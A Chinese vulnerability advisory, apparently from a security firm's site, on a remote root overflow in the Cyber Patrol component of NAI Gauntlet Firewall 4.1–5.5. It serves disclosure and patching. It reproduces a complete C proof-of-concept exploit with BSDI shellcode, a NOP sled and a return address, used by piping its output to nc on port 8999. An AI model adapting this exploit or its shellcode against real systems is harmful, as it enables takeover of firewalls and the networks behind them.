安全研究

安全漏洞
Gauntlet 防火墙远程溢出漏洞

发布日期:2000-05-25
更新日期:2000-05-26

受影响系统:
Network Associates Gauntlet Firewall 4.1 / 4.2 / 5.0 / 5.5
描述:
NAI Gauntlet防火墙(4.1/4.2/5.0/5.5)中所带的过滤软件Cyber Patrol存在一个溢出问题,
导致一个远程攻击者获得防火墙的root访问权限,并且在防火墙上执行任意系统命令。
缺省情况下,Cyber Patrol在gauntlet安装时被装入,30天后过期。在Cyber Patrol运行期
间,Gauntlet防火墙是可能受到远程攻击的。由于这个过滤软件可以通过外部访问,因此外部
攻击者也可能利用这个漏洞,而不仅仅限于内部网络用户。

<* 来源: Jim Stickley
         gramble none <gramble_n@HOTMAIL.COM>
*>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/*
*                  Animal.c
*
*
* Remote Gauntlet BSDI proof of concept exploit.
* Garrison technologies may have found it, but I am the
* one who released it.  ;) I do not have a Sparc or I would
* write up the Solaris one too.  If you have one, please
* make the changes needed and post it.  Thanks.
*
* Script kiddies can go away, this will only execute a file
* named /bin/zz on the remote firewall.  To test this code,
* make a file named /bin/zz and chmod it to 700.
* I suggest for the test you just have the zz file make a note
* in syslog or whatever makes you happy.
*
* This code is intened for proof of concept only.
*
*
* _Gramble_
*                                             Hey BuBBles
*
*To use:
*      # Animal | nc <address> 8999
*/


#include <stdio.h>


char data[364];

main() {
        int i;
    char shelloutput[80];


/* just borrowed this execute code from another exploit */

    unsigned char shell[] =
        "\x90"
    "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76"
    "\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07"
    "\xff\xe8\xdc\xff\xff\xff/bin/zz\x00";


        for(i=0;i<264;i++)
                data[i]=0x90;
        data[i]=0x30;i++;
        data[i]=0x9b;i++;
        data[i]=0xbf;i++;
        data[i]=0xef;i++;
        data[i] = 0x00;
    for (i=0; i<strlen(shell); i++)
        shelloutput[i] = shell[i];
        shelloutput[i] = 0x00;

    printf("10003.http://%s%s", data, shelloutput);


}


建议:

NAI已经提供了针对各个Gauntlet防火墙版本的补丁以及安全建议,您可以在下列地址找到相
关内容:

http://www.tis.com/support/cyberadvisory.html


浏览次数:6079
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障